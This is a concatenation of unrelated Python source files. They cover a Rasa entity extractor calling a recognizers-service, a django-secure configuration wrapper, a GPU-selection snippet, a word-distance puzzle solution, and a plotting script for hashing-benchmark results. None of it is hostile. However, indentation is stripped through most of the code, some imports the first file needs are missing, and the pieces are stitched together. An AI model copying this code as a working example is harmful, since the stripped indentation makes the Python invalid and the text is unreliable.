from rasa.shared.nlu.training_data.message import Message
import rasa.shared.utils.io
logger = logging.getLogger(__name__)
def convert_recognizers_format_to_rasa(
matches: List[Dict[Text, Any]]
) -> List[Dict[Text, Any]]:
extracted = []
for match in matches:
entity = {
"start": match["start"],
"end": match["end"],
"text": match["text"],
"value": match.get("resolution", {}).get("value"),
"confidence": 1.0,
"additional_info": match["resolution"],
"entity": match["typeName"],
}
extracted.append(entity)
return extracted
class RecognizersServiceEntityExtractor(EntityExtractor):
"""Searches for structured entites, e.g. dates, using recognizers-service."""
defaults = {
# by default all entities recognized by recognizers-service are returned
# entities can be configured to contain an array of strings
# with the names of the entities to filter for
"entities": None,
# by default all units are returned
# units can be configured to contain an array of strings
# with the names of the units to filter for
"units": None,
# http url of the running recognizers-service
"url": None,
# culture - if not set, we will use English (en-us)
"culture": 'en-us',
# a flag to have the service return original numbers in the resolution
"show_numbers": True,
# a flag to have the service merge overlapping entities
"merge_results": True,
# Timeout for receiving response from http url of the running recognizers-service
# if not set the default timeout of recognizers-service url is set to 3 seconds.
"timeout": 3,
}
def __init__(
self,
component_config: Optional[Dict[Text, Any]] = None,
) -> None:
super().__init__(component_config)
@classmethod
def create(
cls, component_config: Dict[Text, Any], config: RasaNLUModelConfig
) -> "RecognizersServiceEntityExtractor":
return cls(component_config)
def _url(self) -> Optional[Text]:
"""Return url of recoginzers-service. Environment var will override."""
if os.environ.get("RECOGNIZERS_SERVICE_URL"):
return os.environ["RECOGNIZERS_SERVICE_URL"]
return self.component_config.get("url")
def _payload(self, text: Text) -> Dict[Text, Any]:
return {
"text": text,
"culture": self.component_config.get("culture"),
"entities": self.component_config.get("entities"),
"units": self.component_config.get("units"),
"showNumbers": self.component_config.get("show_numbers"),
"mergeResults": self.component_config.get("merge_results"),
}
def _recognizers_parse(self, text: Text) -> List[Dict[Text, Any]]:
"""Sends the request to recognizers-service and parses the result.
Args:
text: Text for recognizers-service server to parse.
Returns:
JSON response from recognizers-service with parse data.
"""
try:
payload = self._payload(text)
headers = {
"Content-Type": "application/json"
}
response = requests.post(
self._url(),
json=payload,
headers=headers,
timeout=self.component_config.get("timeout"),
)
if response.status_code == 200:
return response.json()
else:
                logger.error(
                    f"Failed to get a proper response from remote "
                    f"recognizers-service at '{self._url()}'. Status Code: "
                    f"{response.status_code}. Response: {response.text}"
                )
return []
except (
requests.exceptions.ConnectionError,
requests.exceptions.ReadTimeout,
) as e:
logger.error(
"Failed to connect to recognizers-service. Make sure "
"the recognizers-service is running/healthy/not stale and the proper host "
"and port are set in the configuration. More "
"information on how to run the server can be found on "
"github: "
"https://github.com/xanthous-tech/recognizers-service "
"Error: {}".format(e)
)
return []
def process(self, message: Message, **kwargs: Any) -> None:
if self._url() is not None:
matches = self._recognizers_parse(message.get(TEXT))
all_extracted = convert_recognizers_format_to_rasa(matches)
entities = self.component_config["entities"]
extracted = RecognizersServiceEntityExtractor.filter_irrelevant_entities(
all_extracted, entities
)
else:
extracted = []
rasa.shared.utils.io.raise_warning(
"recognizers-service component in pipeline, but no "
"`url` configuration in the config "
"file nor is `RECOGNIZERS_SERVICE_URL` "
"set as an environment variable. No entities will be extracted!",
docs="https://github.com/xanthous-tech/recognizers-service",
)
extracted = self.add_extractor_name(extracted)
message.set(ENTITIES, message.get(ENTITIES, []) + extracted, add_to_output=True)
@classmethod
def load(
cls,
meta: Dict[Text, Any],
model_dir: Text = None,
model_metadata: Optional[Metadata] = None,
cached_component: Optional["RecognizersServiceEntityExtractor"] = None,
**kwargs: Any,
) -> "RecognizersServiceEntityExtractor":
return cls(meta)
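# Usage sketch (hedged): an illustrative pipeline entry for this component in a
# Rasa config; the class path, url, and entity names below are placeholders,
# while the keys mirror the `defaults` dict above.
#
#   pipeline:
#     - name: "custom.RecognizersServiceEntityExtractor"
#       url: "http://localhost:8080/parse"
#       culture: "en-us"
#       entities: ["datetimeV2", "number"]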
|
157649
|
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
class Configuration(object):
def __init__(self, **kwargs):
self.defaults = kwargs
def __getattr__(self, k):
try:
return getattr(settings, k)
except AttributeError:
if k in self.defaults:
return self.defaults[k]
raise ImproperlyConfigured("django-secure requires %s setting." % k)
conf = Configuration(
SECURE_HSTS_SECONDS=0,
SECURE_HSTS_INCLUDE_SUBDOMAINS=False,
SECURE_FRAME_DENY=False,
SECURE_CONTENT_TYPE_NOSNIFF=False,
SECURE_BROWSER_XSS_FILTER=False,
SECURE_SSL_REDIRECT=False,
SECURE_SSL_HOST=None,
SECURE_REDIRECT_EXEMPT=[],
SECURE_PROXY_SSL_HEADER=None,
SECURE_CHECKS=[
"djangosecure.check.csrf.check_csrf_middleware",
"djangosecure.check.sessions.check_session_cookie_secure",
"djangosecure.check.sessions.check_session_cookie_httponly",
"djangosecure.check.djangosecure.check_security_middleware",
"djangosecure.check.djangosecure.check_sts",
"djangosecure.check.djangosecure.check_sts_include_subdomains",
"djangosecure.check.djangosecure.check_frame_deny",
"djangosecure.check.djangosecure.check_content_type_nosniff",
"djangosecure.check.djangosecure.check_xss_filter",
"djangosecure.check.djangosecure.check_ssl_redirect",
"djangosecure.check.djangosecure.check_secret_key",
]
)
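# Usage sketch (hedged; the import path is illustrative): attribute lookups
# resolve from django settings first, then fall back to the defaults above;
# a name missing from both raises ImproperlyConfigured.
#
#   from djangosecure.conf import conf
#   conf.SECURE_HSTS_SECONDS   # 0 unless overridden in settings
#   conf.SECURE_FRAME_DENY     # False unless overridden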
|
157659
|
import gc
import os
import logging
import numpy as np
import tensorflow as tf
from nlp_toolkit.classifier import Classifier
from nlp_toolkit.labeler import Labeler
from nlp_toolkit.data import Dataset
from nlp_toolkit.config import YParams
logging.basicConfig(level=logging.INFO)
try:
import GPUtil
from keras.backend.tensorflow_backend import set_session
num_all_gpu = len(GPUtil.getGPUs())
avail_gpu = GPUtil.getAvailable(order='memory')
num_avail_gpu = len(avail_gpu)
gpu_no = str(avail_gpu[0])
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'
os.environ['CUDA_VISIBLE_DEVICES'] = gpu_no
logging.info('Choose the most free GPU: %s, currently not support multi-gpus' % gpu_no)
tf_config = tf.ConfigProto()
tf_config.gpu_options.allow_growth = True
set_session(tf.Session(config=tf_config))
except FileNotFoundError:
logging.info('nvidia-smi is missing, often means no gpu on this machine. '
'fall back to cpu!')
gc.disable()
|
157680
|
class Solution:
def shortestWordDistance(self, words, word1, word2):
i1 = i2 = -1
res, same = float("inf"), word1 == word2
for i, w in enumerate(words):
if w == word1:
if same: i2 = i1
i1 = i
if i2 >= 0: res = min(res, i1 - i2)
elif w == word2:
i2 = i
if i1 >= 0: res = min(res, i2 - i1)
return res
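# Usage sketch (illustrative): the single pass keeps the latest index of each
# word; when word1 == word2 the previous match is shifted into i2 before i1
# is updated, so the distance is between consecutive occurrences.
if __name__ == '__main__':
    s = Solution()
    words = ["practice", "makes", "perfect", "coding", "makes"]
    print(s.shortestWordDistance(words, "makes", "coding"))  # 1
    print(s.shortestWordDistance(words, "makes", "makes"))   # 3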
|
157683
|
import os
import re
import glob
import numpy as np
import matplotlib.pylab as plt
import matplotlib
from scipy.spatial import ConvexHull
from scipy.interpolate import interp1d
from itertools import chain, count
from collections import defaultdict
from os import makedirs
from os.path import isdir, isfile, join
from plot_util import *
from plot_other import *
# ------------------------------------------------------------------------------
matplotlib.rcParams['pdf.fonttype'] = 42
matplotlib.rcParams['ps.fonttype'] = 42
method_labels_map = {
'FH': 'FH',
'FH_Minus': 'FH$^-$',
'NH': 'NH',
'FH_wo_S': 'FH-wo-S',
'FH_Minus_wo_S': 'FH$^{-}$-wo-S',
'NH_wo_S': 'NH-wo-S',
'EH': 'EH',
'Orig_EH': 'EH',
'BH': 'BH',
'Orig_BH': 'BH',
'MH': 'MH',
'Orig_MH': 'MH',
'Random_Scan': 'Random-Scan',
'Sorted_Scan': 'Sorted-Scan',
'Linear': 'Linear-Scan'
}
dataset_labels_map = {
'Yelp': 'Yelp',
'Music': 'Music-100',
'GloVe100': 'GloVe',
'Tiny1M': 'Tiny-1M',
'Msong': 'Msong',
'MovieLens150': 'MovieLens',
'Netflix300': 'Netflix',
'Yahoo300': 'Yahoo',
'Mnist': 'Mnist',
'Sift': 'Sift',
'Gaussian': 'Gaussian',
'Gist': 'Gist',
}
# datasets = ['Yelp', 'GloVe100']
datasets = ['Yelp', 'Music', 'GloVe100', 'Tiny1M', 'Msong']
dataset_labels = [dataset_labels_map[dataset] for dataset in datasets]
method_colors = ['red', 'blue', 'green', 'purple', 'deepskyblue', 'darkorange',
'olive', 'deeppink', 'dodgerblue', 'dimgray']
method_markers = ['o', '^', 's', 'd', '*', 'p', 'x', 'v', 'D', '>']
# ------------------------------------------------------------------------------
def calc_width_and_height(n_datasets, n_rows):
'''
calc the width and height of figure
:params n_datasets: number of dataset (integer)
:params n_rows: number of rows (integer)
:returns: width and height of figure
'''
fig_width = 0.55 + 3.333 * n_datasets
fig_height = 0.80 + 2.5 * n_rows
return fig_width, fig_height
# ------------------------------------------------------------------------------
def get_filename(input_folder, dataset_name, method_name):
'''
    get the result file name '<dataset>_<method>.out' in the input folder
    :params input_folder: input folder (string)
    :params dataset_name: name of dataset (string)
    :params method_name: name of method (string)
    :returns: result file name (string)
'''
name = '%s%s_%s.out' % (input_folder, dataset_name, method_name)
return name
# ------------------------------------------------------------------------------
def parse_res(filename, chosen_top_k):
'''
parse result and get info such as ratio, qtime, recall, index_size,
chosen_k, and the setting of different methods
BH: m=2, l=8, b=0.90
Indexing Time: 2.708386 Seconds
Estimated Memory: 347.581116 MB
cand=10000
1 5.948251 2.960960 0.000000 0.000000 0.844941
5 4.475743 2.954690 0.400000 0.000200 0.845279
10 3.891794 2.953910 0.900000 0.000899 0.845703
20 3.289422 2.963460 0.950000 0.001896 0.846547
50 2.642880 2.985980 0.900000 0.004478 0.849082
100 2.244649 3.012860 0.800000 0.007922 0.853307
cand=50000
1 3.905541 14.901140 6.000000 0.000120 4.222926
5 2.863510 14.905370 4.800000 0.000480 4.223249
10 2.626913 14.910181 5.300000 0.001061 4.223649
20 2.392440 14.913270 4.850000 0.001941 4.224458
50 2.081206 14.931760 4.560000 0.004558 4.227065
100 1.852284 14.964050 4.500000 0.008987 4.231267
'''
setting_pattern = re.compile(r'\S+\s+.*=.*')
setting_m = re.compile(r'.*(m)=(\d+).*')
setting_l = re.compile(r'.*(l)=(\d+).*')
setting_M = re.compile(r'.*(M)=(\d+).*')
setting_s = re.compile(r'.*(s)=(\d+).*')
setting_b = re.compile(r'.*(b)=(\d+\.\d+).*')
param_settings = [setting_m, setting_l, setting_M, setting_s, setting_b]
index_time_pattern = re.compile(r'Indexing Time: (\d+\.\d+).*')
memory_usage_pattern = re.compile(r'Estimated Memory: (\d+\.\d+).*')
candidate_pattern = re.compile(r'.*cand=(\d+).*')
records_pattern = re.compile(r'(\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)\s*(\d+\.\d+)')
params = {}
with open(filename, 'r') as f:
for line in f:
res = setting_pattern.match(line)
if res:
for param_setting in param_settings:
tmp_res = param_setting.match(line)
if tmp_res is not None:
# print(tmp_res.groups())
params[tmp_res.group(1)] = tmp_res.group(2)
# print("setting=", line)
            res = index_time_pattern.match(line)
            if res:
                indexing_time = float(res.group(1))
                # print('indexing_time=', indexing_time)
res = memory_usage_pattern.match(line)
if res:
memory_usage = float(res.group(1))
# print('memory_usage=', memory_usage)
res = candidate_pattern.match(line)
if res:
cand = int(res.group(1))
# print('cand=', cand)
res = records_pattern.match(line)
if res:
top_k = int(res.group(1))
ratio = float(res.group(2))
qtime = float(res.group(3))
recall = float(res.group(4))
precision = float(res.group(5))
fraction = float(res.group(6))
# print(top_k, ratio, qtime, recall, precision, fraction)
if top_k == chosen_top_k:
                    yield ((cand, params), (top_k, indexing_time, memory_usage,
                        ratio, qtime, recall, precision, fraction))
# ------------------------------------------------------------------------------
def getindexingtime(res):
return res[1]
def getindexsize(res):
return res[2]
def getratio(res):
return res[3]
def gettime(res):
return res[4]
def getrecall(res):
return res[5]
def getprecision(res):
return res[6]
def getfraction(res):
return res[7]
def get_cand(res):
return int(res[0][0])
def get_l(res):
return int(res[0][1]['l'])
def get_m(res):
return int(res[0][1]['m'])
def get_s(res):
return int(res[0][1]['s'])
def get_time(res):
return float(res[1][4])
def get_recall(res):
return float(res[1][5])
def get_precision(res):
return float(res[1][6])
def get_fraction(res):
return float(res[1][7])
# ------------------------------------------------------------------------------
def lower_bound_curve(xys):
'''
get the time-recall curve by convex hull and interpolation
:params xys: 2-dim array (np.array)
:returns: time-recall curve with interpolation
'''
# add noise and conduct convex hull to find the curve
eps = np.random.normal(size=xys.shape) * 1e-6
xys += eps
# print(xys)
hull = ConvexHull(xys)
hull_vs = xys[hull.vertices]
# hull_vs = np.array(sorted(hull_vs, key=lambda x:x[1]))
# print("hull_vs: ", hull_vs)
# find max pair (maxv0) and min pairs (v1s) from the convex hull
v1s = []
maxv0 = [-1, -1]
for v0, v1 in zip(hull_vs, chain(hull_vs[1:], hull_vs[:1])):
# print(v0, v1)
if v0[1] > v1[1] and v0[0] > v1[0]:
v1s = np.append(v1s, v1, axis=-1)
if v0[1] > maxv0[1]:
maxv0 = v0
# print(v1s, maxv0)
# interpolation: vs[:, 1] -> recall (x), vs[:, 0] -> time (y)
vs = np.array(np.append(maxv0, v1s)).reshape(-1, 2) # 2-dim array
f = interp1d(vs[:, 1], vs[:, 0])
minx = np.min(vs[:, 1]) + 1e-6
maxx = np.max(vs[:, 1]) - 1e-6
x = np.arange(minx, maxx, 1.0) # the interval of interpolation: 1.0
y = list(map(f, x)) # get time (y) by interpolation
return x, y
# ------------------------------------------------------------------------------
def upper_bound_curve(xys, interval, is_sorted):
'''
get the time-ratio and precision-recall curves by convex hull and interpolation
:params xys: 2-dim array (np.array)
:params interval: the interval of interpolation (float)
:params is_sorted: sort the convex hull or not (boolean)
:returns: curve with interpolation
'''
# add noise and conduct convex hull to find the curve
eps = np.random.normal(size=xys.shape) * 1e-6
xys += eps
# print(xys)
xs = xys[:, 0]
if len(xs) > 2 and xs[-1] > 0:
hull = ConvexHull(xys)
hull_vs = xys[hull.vertices]
if is_sorted:
hull_vs = np.array(sorted(hull_vs, key=lambda x:x[1]))
print("hull_vs: ", hull_vs)
# find max pair (maxv0) and min pairs (v1s) from the convex hull
v1s = []
maxv0 = [-1, -1]
for v0, v1 in zip(hull_vs, chain(hull_vs[1:], hull_vs[:1])):
# print(v0, v1)
if v0[1] > v1[1] and v0[0] < v1[0]:
v1s = np.append(v1s, v1, axis=-1)
if v0[1] > maxv0[1]:
maxv0 = v0
        # print(v1s, maxv0)
# interpolation: vs[:, 1] -> recall (x), vs[:, 0] -> time (y)
vs = np.array(np.append(maxv0, v1s)).reshape(-1, 2) # 2-dim array
if len(vs) >= 2:
f = interp1d(vs[:, 1], vs[:, 0])
minx = np.min(vs[:, 1]) + 1e-6
maxx = np.max(vs[:, 1]) - 1e-6
x = np.arange(minx, maxx, interval)
y = list(map(f, x)) # get time (y) by interpolation
return x, y
else:
return xys[:, 0], xys[:, 1]
else:
return xys[:, 0], xys[:, 1]
# ------------------------------------------------------------------------------
def lower_bound_curve2(xys):
'''
get the querytime-indexsize and querytime-indextime curve by convex hull
:params xys: 2-dim array (np.array)
:returns: querytime-indexsize and querytime-indextime curve
'''
# add noise and conduct convex hull to find the curve
eps = np.random.normal(size=xys.shape) * 1e-6
xys += eps
# print(xys)
xs = xys[:, 0]
if len(xs) > 2 and xs[-1] > 0:
# conduct convex hull to find the curve
hull = ConvexHull(xys)
hull_vs = xys[hull.vertices]
# print("hull_vs: ", hull_vs)
ret_vs = []
for v0, v1, v2 in zip(chain(hull_vs[-1:], hull_vs[:-1]), hull_vs, \
chain(hull_vs[1:], hull_vs[:1])):
# print(v0, v1, v2)
if v0[0] < v1[0] or v1[0] < v2[0]:
ret_vs = np.append(ret_vs, v1, axis=-1)
# sort the results in ascending order of x without interpolation
ret_vs = ret_vs.reshape((-1, 2))
ret_vs = np.array(sorted(ret_vs, key=lambda x:x[0]))
return ret_vs[:, 0], ret_vs[:, 1]
else:
return xys[:, 0], xys[:, 1]
# ------------------------------------------------------------------------------
def plot_time_fraction_recall(chosen_top_k, methods, input_folder, output_folder):
'''
draw the querytime-recall curves and fraction-recall curves for all methods
on all datasets
:params chosen_top_k: top_k value for drawing figure (integer)
:params methods: a list of method (list)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:returns: None
'''
n_datasets = len(datasets)
fig_width, fig_height = calc_width_and_height(n_datasets, 2)
plt_helper = PlotHelper(plt, fig_width, fig_height)
plt_helper.plot_subplots_adjust() # define a window for a figure
method_labels = [method_labels_map[method] for method in methods]
for di, (dataset, dataset_label) in enumerate(zip(datasets, dataset_labels)):
# set up two sub-figures
ax_recall = plt.subplot(2, n_datasets, di+1)
plt.title(dataset_label) # title
plt.xlabel('Recall (%)') # label of x-axis
plt.xlim(0, 100) # limit (or range) of x-axis
ax_fraction = plt.subplot(2, n_datasets, n_datasets+di+1)
plt.xlabel('Recall (%)') # label of x-axis
plt.xlim(0, 100) # limit (or range) of x-axis
if di == 0:
ax_recall.set_ylabel('Query Time (ms)')
ax_fraction.set_ylabel('Fraction (%)')
min_t_y = 1e9; max_t_y = -1e9
min_f_y = 1e9; max_f_y = -1e9
for method_idx, method, method_label, method_color, method_marker in \
zip(count(), methods, method_labels, method_colors, method_markers):
# get file name for this method on this dataset
filename = get_filename(input_folder, dataset, method)
if filename is None: continue
print(filename)
# get time-recall and fraction-recall results from disk
time_recalls = []
fraction_recalls = []
for _,res in parse_res(filename, chosen_top_k):
time_recalls += [[gettime(res), getrecall(res)]]
fraction_recalls += [[getfraction(res), getrecall(res)]]
time_recalls = np.array(time_recalls)
fraction_recalls = np.array(fraction_recalls)
# print(time_recalls, fraction_recalls)
# get the time-recall curve by convex hull and interpolation
lower_recalls, lower_times = lower_bound_curve(time_recalls)
min_t_y = min(min_t_y, np.min(lower_times))
max_t_y = max(max_t_y, np.max(lower_times))
ax_recall.semilogy(lower_recalls, lower_times, '-',
color=method_color, marker=method_marker,
label=method_label if di==0 else "", markevery=10,
markerfacecolor='none', markersize=10)
# get the fraction-recall curve by convex hull
lower_recalls, lower_fractions = lower_bound_curve(fraction_recalls)
min_f_y = min(min_f_y, np.min(lower_fractions))
max_f_y = max(max_f_y, np.max(lower_fractions))
ax_fraction.semilogy(lower_recalls, lower_fractions, '-',
color=method_color, marker=method_marker, label="",
markevery=10, markerfacecolor='none', markersize=10,
zorder=len(methods)-method_idx)
# set up the limit (or range) of y-axis
plt_helper.set_y_axis_log10(ax_recall, min_t_y, max_t_y)
plt_helper.set_y_axis_log10(ax_fraction, min_f_y, max_f_y)
# plot legend and save figure
plt_helper.plot_fig_legend(ncol=len(methods))
plt_helper.plot_and_save(output_folder, 'time_fraction_recall')
# ------------------------------------------------------------------------------
def plot_time_index_k(chosen_top_k, chosen_top_ks, recall_level, size_x_scales,\
time_x_scales, methods, input_folder, output_folder):
    '''
    draw the querytime-indexsize, querytime-indexingtime and querytime-k
    curves for all methods on all datasets
    :params chosen_top_k: top_k value for drawing figure (integer)
    :params chosen_top_ks: a list of top_k values for drawing figure (list)
    :params recall_level: recall value for drawing figure (integer)
    :params size_x_scales: a list of x scales for index size (list)
    :params time_x_scales: a list of x scales for indexing time (list)
    :params methods: a list of methods (list)
    :params input_folder: input folder (string)
    :params output_folder: output folder (string)
    :returns: None
    '''
n_datasets = len(datasets)
fig_width, fig_height = calc_width_and_height(n_datasets, 3)
plt_helper = PlotHelper(plt, fig_width, fig_height)
plt_helper.plot_subplots_adjust() # define a window for a figure
method_labels = [method_labels_map[method] for method in methods]
for di, (dataset, dataset_label) in enumerate(zip(datasets, dataset_labels)):
# set up three sub-figures
ax_size = plt.subplot(3, n_datasets, di+1)
plt.title(dataset_label) # title
plt.xlabel('Index Size (MB)') # label of x-axis
ax_time = plt.subplot(3, n_datasets, n_datasets+di+1)
plt.xlabel('Indexing Time (Seconds)') # label of x-axis
ax_k = plt.subplot(3, n_datasets, 2*n_datasets+di+1)
plt.xlabel('$k$') # label of x-axis
if di == 0:
ax_size.set_ylabel('Query Time (ms)')
ax_time.set_ylabel('Query Time (ms)')
ax_k.set_ylabel('Query Time (ms)')
min_size_x = 1e9; max_size_x = -1e9
min_size_y = 1e9; max_size_y = -1e9
min_time_x = 1e9; max_time_x = -1e9
min_time_y = 1e9; max_time_y = -1e9
min_k_y = 1e9; max_k_y = -1e9
for method_idx, method, method_label, method_color, method_marker in \
zip(count(), methods, method_labels, method_colors, method_markers):
# get file name for this method on this dataset
filename = get_filename(input_folder, dataset, method)
if filename is None: continue
print(filename)
# ------------------------------------------------------------------
# query time vs. index size and indexing time
# ------------------------------------------------------------------
# get all results from disk
chosen_ks_dict = defaultdict(list)
for _,res in parse_res(filename, chosen_top_k):
query_time = gettime(res)
recall = getrecall(res)
index_time = getindexingtime(res)
index_size = getindexsize(res)
chosen_ks_dict[(index_time, index_size)] += [[recall, query_time]]
# get querytime-indexsize and querytime-indexingtime results if its
# recall is higher than recall_level
index_times, index_sizes, querytimes_at_recall = [], [], []
for (index_time, index_size), recall_querytimes_ in chosen_ks_dict.items():
# add [[0, 0]] for interpolation
recall_querytimes_ = np.array([[0, 0]] + recall_querytimes_)
recalls, query_times = lower_bound_curve2(recall_querytimes_)
if np.max(recalls) > recall_level:
# get the estimated time at recall level by interpolation
f = interp1d(recalls, query_times)
querytime_at_recall = f(recall_level)
# update results
index_times += [index_time]
index_sizes += [index_size]
querytimes_at_recall += [querytime_at_recall]
# print('interp, ', querytime_at_recall, index_size, index_time)
index_times = np.array(index_times)
index_sizes = np.array(index_sizes)
querytimes_at_recall = np.array(querytimes_at_recall)
# get the querytime-indexsize curve by convex hull
isize_qtime = np.zeros(shape=(len(index_sizes), 2))
isize_qtime[:, 0] = index_sizes
isize_qtime[:, 1] = querytimes_at_recall
lower_isizes, lower_qtimes = lower_bound_curve2(isize_qtime)
if len(lower_isizes) > 0:
# print(method, lower_isizes, lower_qtimes)
min_size_x = min(min_size_x, np.min(lower_isizes))
max_size_x = max(max_size_x, np.max(lower_isizes))
min_size_y = min(min_size_y, np.min(lower_qtimes))
max_size_y = max(max_size_y, np.max(lower_qtimes))
ax_size.semilogy(lower_isizes, lower_qtimes, '-', color=method_color,
marker=method_marker, label=method_label if di==0 else "",
markerfacecolor='none', markersize=10)
# get the querytime-indextime curve by convex hull
itime_qtime = np.zeros(shape=(len(index_times), 2))
itime_qtime[:, 0] = index_times
itime_qtime[:, 1] = querytimes_at_recall
lower_itimes, lower_qtimes = lower_bound_curve2(itime_qtime)
# print(method, lower_itimes, lower_qtimes)
min_time_x = min(min_time_x, np.min(lower_itimes))
max_time_x = max(max_time_x, np.max(lower_itimes))
min_time_y = min(min_time_y, np.min(lower_qtimes))
max_time_y = max(max_time_y, np.max(lower_qtimes))
ax_time.semilogy(lower_itimes, lower_qtimes, '-', color=method_color,
marker=method_marker, label="", markerfacecolor='none',
markersize=10, zorder=len(methods)-method_idx)
# ------------------------------------------------------------------
# query time vs. k
# ------------------------------------------------------------------
# get all results from disk
chosen_ks_dict = defaultdict(list)
            for top_k in chosen_top_ks:
                for _,res in parse_res(filename, top_k):
                    query_time = gettime(res)
                    recall = getrecall(res)
                    chosen_ks_dict[top_k] += [[recall, query_time]]
            # get querytime-k results if the recall is higher than recall_level
chosen_ks, querytimes_at_recall = [], []
for chosen_k, recall_querytimes_ in chosen_ks_dict.items():
# add [[0, 0]] for interpolation
recall_querytimes_ = np.array([[0, 0]] + recall_querytimes_)
recalls, query_times = lower_bound_curve2(recall_querytimes_)
if np.max(recalls) > recall_level:
# get the estimated time at recall level by interpolation
f = interp1d(recalls, query_times)
querytime_at_recall = f(recall_level)
# update results
chosen_ks += [chosen_k]
querytimes_at_recall += [querytime_at_recall]
chosen_ks = np.array(chosen_ks)
querytimes_at_recall = np.array(querytimes_at_recall)
min_k_y = min(min_k_y, np.min(querytimes_at_recall))
max_k_y = max(max_k_y, np.max(querytimes_at_recall))
ax_k.semilogy(chosen_ks, querytimes_at_recall, '-', color=method_color,
marker=method_marker, label="", markerfacecolor='none',
markersize=10, zorder=len(methods)-method_idx)
# set up the limit (or range) of y-axis
plt_helper.set_x_axis(ax_size, min_size_x, size_x_scales[di]*max_size_x)
plt_helper.set_y_axis_log10(ax_size, min_size_y, max_size_y)
plt_helper.set_x_axis(ax_time, min_time_x, time_x_scales[di]*max_time_x)
plt_helper.set_y_axis_log10(ax_time, min_time_y, max_time_y)
plt_helper.set_y_axis_log10(ax_k, min_k_y, max_k_y)
# plot legend and save figure
plt_helper.plot_fig_legend(ncol=len(methods))
plt_helper.plot_and_save(output_folder, 'time_index_k_%d' % recall_level)
# ------------------------------------------------------------------------------
def plot_time_recall_indextime(chosen_top_k, recall_level, time_x_scales, \
methods, input_folder, output_folder):
'''
    draw the querytime-recall curves and querytime-indexingtime curves for
    all methods on all datasets
:params chosen_top_k: top_k value for drawing figure (integer)
:params recall_level: recall value for drawing figure (integer)
:params time_x_scales: a list of x scales for indexing time (list)
    :params methods: a list of methods (list)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:returns: None
'''
n_datasets = len(datasets)
fig_width, fig_height = calc_width_and_height(n_datasets, 2)
plt_helper = PlotHelper(plt, fig_width, fig_height)
plt_helper.plot_subplots_adjust() # define a window for a figure
method_labels = [method_labels_map[method] for method in methods]
for di, (dataset, dataset_label) in enumerate(zip(datasets, dataset_labels)):
# set up sub-figure
ax_recall = plt.subplot(2, n_datasets, di+1)
plt.title(dataset_label) # title
plt.xlim(0, 100) # limit (or range) of x-axis
plt.xlabel('Recall (%)') # label of x-axis
ax_time = plt.subplot(2, n_datasets, n_datasets+di+1)
plt.xlabel('Indexing Time (Seconds)') # label of x-axis
if di == 0:
ax_recall.set_ylabel('Query Time (ms)')
ax_time.set_ylabel('Query Time (ms)')
min_r_y = 1e9; max_r_y = -1e9
min_t_x = 1e9; max_t_x = -1e9
min_t_y = 1e9; max_t_y = -1e9
for method_idx, method, method_label, method_color, method_marker in \
zip(count(), methods, method_labels, method_colors, method_markers):
# get file name for this method on this dataset
filename = get_filename(input_folder, dataset, method)
if filename is None: continue
print(filename)
# ------------------------------------------------------------------
# query time vs. recall
# ------------------------------------------------------------------
time_recalls = []
for _,res in parse_res(filename, chosen_top_k):
time_recalls += [[gettime(res), getrecall(res)]]
time_recalls = np.array(time_recalls)
# print(time_recalls)
# get the time-recall curve by convex hull and interpolation, where
# lower_recalls -> x, lower_times -> y
lower_recalls, lower_times = lower_bound_curve(time_recalls)
min_r_y = min(min_r_y, np.min(lower_times))
max_r_y = max(max_r_y, np.max(lower_times))
ax_recall.semilogy(lower_recalls, lower_times, '-', color=method_color,
marker=method_marker, label=method_label if di==0 else "",
markevery=10, markerfacecolor='none', markersize=7,
zorder=len(methods)-method_idx)
# ------------------------------------------------------------------
# query time vs. indexing time
# ------------------------------------------------------------------
# get all results from disk
chosen_ks_dict = defaultdict(list)
for _,res in parse_res(filename, chosen_top_k):
query_time = gettime(res)
recall = getrecall(res)
index_time = getindexingtime(res)
chosen_ks_dict[index_time] += [[recall, query_time]]
            # get querytime-indexingtime results if the recall is higher than
            # recall_level
index_times, querytimes_at_recall = [], []
for index_time, recall_querytimes_ in chosen_ks_dict.items():
# add [[0, 0]] for interpolation
                recall_querytimes_ = np.array([[0, 0]] + recall_querytimes_)
recalls, query_times = lower_bound_curve2(recall_querytimes_)
if np.max(recalls) > recall_level:
# get the estimated time at recall level by interpolation
f = interp1d(recalls, query_times)
querytime_at_recall = f(recall_level)
# update results
index_times += [index_time]
querytimes_at_recall += [querytime_at_recall]
# print('interp, ', querytime_at_recall, index_time)
index_times = np.array(index_times)
querytimes_at_recall = np.array(querytimes_at_recall)
# get the querytime-indextime curve by convex hull
itime_qtimes = np.zeros(shape=(len(index_times), 2))
itime_qtimes[:, 0] = index_times
itime_qtimes[:, 1] = querytimes_at_recall
lower_itimes, lower_qtimes = lower_bound_curve2(itime_qtimes)
if len(lower_itimes) > 0:
# print(method, lower_itimes, lower_qtimes)
min_t_x = min(min_t_x, np.min(lower_itimes))
max_t_x = max(max_t_x, np.max(lower_itimes))
min_t_y = min(min_t_y, np.min(lower_qtimes))
max_t_y = max(max_t_y, np.max(lower_qtimes))
ax_time.semilogy(lower_itimes, lower_qtimes, '-', color=method_color,
marker=method_marker, label="", markerfacecolor='none',
markersize=10, zorder=len(methods)-method_idx)
# set up the limit (or range) of y-axis
plt_helper.set_y_axis_log10(ax_recall, min_r_y, max_r_y)
plt_helper.set_x_axis(ax_time, min_t_x, time_x_scales[di]*max_t_x)
if max_t_y / min_t_y < 10:
plt_helper.set_y_axis_close(ax_time, min_t_y, max_t_y)
else:
plt_helper.set_y_axis_log10(ax_time, min_t_y, max_t_y)
# plot legend and save figure
plt_helper.plot_fig_legend(ncol=len(methods))
plt_helper.plot_and_save(output_folder, 'time_recall_indextime_%d' %
recall_level)
# ------------------------------------------------------------------------------
def plot_params(chosen_top_k, dataset, input_folder, output_folder, \
fig_width=19.2, fig_height=3.0):
'''
draw the querytime-recall curves for the parameters of NH and FH
:params chosen_top_k: top_k value for drawing figure (integer)
:params dataset: name of dataset (string)
:params input_folder: input folder (string)
:params output_folder: output folder (string)
:params fig_width: the width of a figure (float)
:params fig_height: the height of a figure (float)
:returns: None
'''
plt.figure(figsize=(fig_width, fig_height))
plt.rcParams.update({'font.size': 13})
left_space = 0.80
bottom_space = 0.55
top_space = 0.30 # 1.2
right_space = 0.25
width_space = 0.24
height_space = 0.37
bottom = bottom_space / fig_height
